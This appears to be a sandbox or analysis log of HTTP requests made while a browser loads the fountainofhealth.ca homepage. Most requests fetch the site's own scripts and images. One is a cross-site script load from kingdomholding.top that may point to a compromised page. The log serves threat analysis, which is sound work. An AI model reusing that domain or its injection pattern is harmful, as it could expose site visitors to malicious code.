    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/custom.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/theme.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/js/ajax-throbber.js?v=1.x HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/attributes.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/jquery.tabbable.shim.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/banner-slider.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/message.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/tooltip.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/displace.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/popover.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/states.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/dialog.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/modal.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/position.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.position.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.ajax.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/ajax.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/js/views_slideshow.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/dialog.ajax.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /libraries/json2/json2.js?v=2 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: i
Source: global traffic HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1
    host: www.youtube.com
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    x-client-data: CLbgygE=
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: i
Source: global traffic HTTP traffic detected: GET /libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ss/index.php?FLeFJ5nY HTTP/1.1
    Host: kingdomholding.top
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://fountainofhealth.ca/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1
    host: fountainofhealth.ca
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
    cookie: _ga=GA1.1.1027095347.1748893175
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1
    host: fountainofhealth.ca
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
    cookie: _ga=GA1.1.1027095347.1748893175
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1
    host: fountainofhealth.ca
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
    cookie: _ga=GA1.1.1027095347.1748893175
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1
    host: fountainofhealth.ca
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
    cookie: _ga=GA1.1.1027095347.1748893175
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
    cookie: _ga=GA1.1.1027095347.1748893175
Source: global traffic HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1
    host: www.youtube.com
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    x-client-data: CLbgygE=
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/6fab0cec561d/main.js? HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175
